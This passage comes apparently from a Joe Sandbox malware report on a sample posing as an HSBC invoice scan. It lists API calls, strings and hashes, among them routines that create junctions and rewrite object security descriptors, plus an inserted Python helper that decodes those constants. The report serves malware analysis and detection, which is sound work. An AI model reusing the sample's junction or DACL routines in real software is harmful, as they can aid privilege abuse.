                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                    • Instruction ID: 1b8de81ea86ec591ced5250f36d63bddf1350f03728a51a4034ef383cefbd90f
                    • Opcode Fuzzy Hash: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                    • Instruction Fuzzy Hash: D581B471004305DBDB14DF10D885FAA77E8FF44718F04A56AFD99AA292EB30ED4ACB61
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 6493cfbf65846084ac551f18c058f954eef59324856bfeae113255028a9c2239
                    • Instruction ID: 78239584fed8d34b7307a50510fbb3944f0a21ea641191aa128e6ff0905c8f8c
                    • Opcode Fuzzy Hash: 6493cfbf65846084ac551f18c058f954eef59324856bfeae113255028a9c2239
                    • Instruction Fuzzy Hash: 2E31A332948205E6DB14FA60CD83EEE77E4DF25760F61202AB449711E1FFE1EE05D652
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00EDC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00EDC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00EDC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00EDC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00EDC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDC569
                    • GetWindowRect.USER32(?,?), ref: 00EDC572
                    • SetWindowTextW.USER32(?,?), ref: 00EDC5DD
                    • GetDesktopWindow.USER32 ref: 00EDC5E3
                    • GetWindowRect.USER32(00000000), ref: 00EDC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDC636
                    • GetClientRect.USER32(?,?), ref: 00EDC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                    • Instruction ID: 48f46d556188a2b51357f8cd7482f06f4a2cbe1f249dbcad4aeb7cf4c79fff1e
                    • Opcode Fuzzy Hash: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                    • Instruction Fuzzy Hash: 04518E3090070AAFDB20DFA8DD85B6EBBF5FF04745F104929E686A26A0C775F945DB40
                    APIs
                    • _memset.LIBCMT ref: 00F0A4C8
                    • DestroyWindow.USER32(?,?), ref: 00F0A542
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0A5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0A5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A5F1
                    • DestroyWindow.USER32(00000000), ref: 00F0A613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E80000,00000000), ref: 00F0A64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A663
                    • GetDesktopWindow.USER32 ref: 00F0A67C
                    • GetWindowRect.USER32(00000000), ref: 00F0A683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0A69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0A6B3
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                    • Instruction ID: b4c59319abf7c3e8fc0ded06793965157fa586900484f4bc7a6aded21fee3d66
                    • Opcode Fuzzy Hash: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                    • Instruction Fuzzy Hash: AC717471550309AFD720CF28CC49F6A7BE6FB89314F080528F985972A1CB72E946EB12
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00F046AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F046F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 79418cafd34083aa6c2e7ee19f7c91f00c03468a4d077394e83c6e070978d5ce
                    • Instruction ID: b6e21e36067b3aec342fead48486898c200eee836e418529acef6f5f2c35f5ca
                    • Opcode Fuzzy Hash: 79418cafd34083aa6c2e7ee19f7c91f00c03468a4d077394e83c6e070978d5ce
                    • Instruction Fuzzy Hash: 5C9161B56043019FCB14EF10C491A69B7E1AF89314F04986DF99A6B3A3DB31FD46EB41
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0BB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F09431), ref: 00F0BBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F0BC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC7D
                    • FreeLibrary.KERNEL32(?), ref: 00F0BC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0BC99
                    • DestroyCursor.USER32(?), ref: 00F0BCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0BCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0BCD1
                      • Part of subcall function 00EA313D: __wcsicmp_l.LIBCMT ref: 00EA31C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 3907162815-1154884017
                    • Opcode ID: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                    • Instruction ID: 470cf14c45b2776922dc8c4f0a4ad479bd05a9f8ef026a31d887ad91d86240e6
                    • Opcode Fuzzy Hash: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                    • Instruction Fuzzy Hash: 5161BFB1900219BBEB24DF64CC45FBE77A8FB08720F108519F915EA1D1DB74A994FBA0
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00EEA636
                    • GetDriveTypeW.KERNEL32 ref: 00EEA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA730
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 25dd0761d46dc90f9904b571607fef360923be28a10b930518c59f33a924a916
                    • Instruction ID: af3912b8cbe97bdb137ef28a7b05a634c4c49ca18849fb85c64254290dc61095
                    • Opcode Fuzzy Hash: 25dd0761d46dc90f9904b571607fef360923be28a10b930518c59f33a924a916
                    • Instruction Fuzzy Hash: DA514B711047099FC704EF21C88186AB7F4FF98718F18596DF89A672A1DB31EE0ACB52
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EEA47A
                    • __swprintf.LIBCMT ref: 00EEA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EEA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EEA4FE
                    • _memset.LIBCMT ref: 00EEA51D
                    • _wcsncpy.LIBCMT ref: 00EEA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EEA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00EEA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00EEA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00EEA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                    • Instruction ID: ab7e82c615cf0ae137c06ad25dab49f0331391736e5b5a353c43ca53c7a03304
                    • Opcode Fuzzy Hash: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                    • Instruction Fuzzy Hash: D131B37150024DABDB21DFA1DC49FEB77BCEF89705F1450BAF508E6160E770A6488B25
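The call sequence in this block has the shape of a junction (mount-point) creation routine: create the directory, open it on the link object itself (FILE_FLAG_OPEN_REPARSE_POINT with FILE_FLAG_BACKUP_SEMANTICS, GENERIC_WRITE, OPEN_EXISTING), write a reparse buffer whose substitute name is built from the "\??\%s" NT path with FSCTL_SET_REPARSE_POINT, and remove the directory again if that fails. Reading that from the report means decoding the raw constants, which the Python below does; it is an added example, not part of the Joe Sandbox report or of the sample. The REPORT_CALLS list is constructed from the two calls listed above with the unknown ("?") arguments set to 0, and only the reparse-point FSCTLs are named.

```python
"""Decode the Win32 constants in the report's junction-creation sequence (added example)."""

# Bit layout of CTL_CODE(DeviceType, Function, Method, Access) from winioctl.h:
#   bits 31..16 DeviceType, 15..14 Access, 13..2 Function, 1..0 Method
FILE_DEVICE_FILE_SYSTEM = 0x09
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Function numbers of the reparse-point FSCTLs (winioctl.h). Any other
# file-system FSCTL decodes with name None.
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT",
                   42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}

# dwFlagsAndAttributes bits relevant here (CreateFileW)
CREATE_FILE_FLAGS = {
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",    # required to open a directory handle
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",  # act on the link, not on its target
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
}
# dwDesiredAccess generic rights
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}


def decode_ctl_code(code):
    """Split an IOCTL/FSCTL value into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    function = (code >> 2) & 0xFFF
    name = FSCTL_FUNCTIONS.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {"device": device, "function": function,
            "method": METHOD_NAMES[code & 0x3],
            "access": ACCESS_NAMES[(code >> 14) & 0x3],
            "name": name}


def decode_flags(value, table):
    """Name every set bit the table knows; leftover bits are reported in hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)        # keys are disjoint single bits, so sum == OR
    if leftover:
        names.append(hex(leftover))
    return names


def is_reparse_point_write(calls):
    """True when a handle opened on the link itself with write access is later
    handed to FSCTL_SET_REPARSE_POINT, i.e. the code creates or rewrites a
    junction/symlink. `calls` is a list of (api, [args]) read off the report."""
    opened_on_link = False
    for api, args in calls:
        if api == "CreateFileW":
            access, flags = args[1], args[5]
            opened_on_link = ("FILE_FLAG_OPEN_REPARSE_POINT" in decode_flags(flags, CREATE_FILE_FLAGS)
                              and "GENERIC_WRITE" in decode_flags(access, GENERIC_ACCESS))
        elif api == "DeviceIoControl" and opened_on_link:
            if decode_ctl_code(args[1])["name"] == "FSCTL_SET_REPARSE_POINT":
                return True
    return False


# Constructed from the two report lines above; '?' arguments are set to 0.
REPORT_CALLS = [
    ("CreateFileW", [0, 0x40000000, 0, 0, 3, 0x02200000, 0]),
    ("DeviceIoControl", [0, 0x000900A4, 0, 0, 0, 0, 0, 0]),
]

if __name__ == "__main__":
    print(decode_ctl_code(0x000900A4))
    print(decode_flags(0x02200000, CREATE_FILE_FLAGS), decode_flags(0x40000000, GENERIC_ACCESS))
    print("sets reparse point:", is_reparse_point_write(REPORT_CALLS))
```

The same decoder applies to any DeviceIoControl line in a report: a device type of 9 with function 41 to 43 is always a reparse-point operation, whatever the surrounding API names look like.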
                    APIs
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                      • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                      • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                      • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                      • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                      • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                      • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED8458
                    • _memset.LIBCMT ref: 00ED846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED848C
                    • GetLengthSid.ADVAPI32(?), ref: 00ED849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00ED84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00ED8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8522
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED854A
                    • CopySid.ADVAPI32(00000000), ref: 00ED8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                    • Instruction ID: 3b9108c4249c061764936c63d97b23a9605cc2da2bad68b8904f5ea22e37cb1d
                    • Opcode Fuzzy Hash: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                    • Instruction Fuzzy Hash: C0614B71900209AFDF10DFA5ED45AAEBBB9FF04314F04816AF815B7291DB319A06DF60
                    APIs
                    • GetDC.USER32(00000000), ref: 00EF76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EF76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00EF76BA
                    • SelectObject.GDI32(00000000,?), ref: 00EF76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EF771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EF7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EF777B
                    • SelectObject.GDI32(00000006,?), ref: 00EF7783
                    • DeleteObject.GDI32(?), ref: 00EF778C
                    • DeleteDC.GDI32(00000006), ref: 00EF7793
                    • ReleaseDC.USER32(00000000,?), ref: 00EF779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 554082c2ca41dd82b92063aafec206bd964873d7861d60ab2a6d137441cb0c8d
                    • Instruction ID: 6ba96322f91c9953caa88abea549b3e04c7f11a21e4634d42e77f2a26bdd0b5e
                    • Opcode Fuzzy Hash: 554082c2ca41dd82b92063aafec206bd964873d7861d60ab2a6d137441cb0c8d
                    • Instruction Fuzzy Hash: AF515E75904209EFCB25CFA8CC84EAEBBB9FF48310F14842DF989A7250D731A844CB50
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00F0FB78), ref: 00EEA0FC
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EEA11E
                    • __swprintf.LIBCMT ref: 00EEA177
                    • __swprintf.LIBCMT ref: 00EEA190
                    • _wprintf.LIBCMT ref: 00EEA246
                    • _wprintf.LIBCMT ref: 00EEA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: e12155c4f70c568ceb1d739a863159a47ce012658298c0bde50e48eb8d6519df
                    • Instruction ID: 910718ba1e28899ab2263696ddf29d941ba011118c3518345a50d45273729973
                    • Opcode Fuzzy Hash: e12155c4f70c568ceb1d739a863159a47ce012658298c0bde50e48eb8d6519df
                    • Instruction Fuzzy Hash: 9251607190420DAACF15FBE0CD86EEEB7B8AF19304F241165F509720A1EB71AF58DB61
                    APIs
                      • Part of subcall function 00EA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E86C6C,?,00008000), ref: 00EA0BB7
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E86E5A
                      • Part of subcall function 00E859CD: _wcscpy.LIBCMT ref: 00E85A05
                      • Part of subcall function 00EA387D: _iswctype.LIBCMT ref: 00EA3885
                    Strings
                    Memory Dump Source
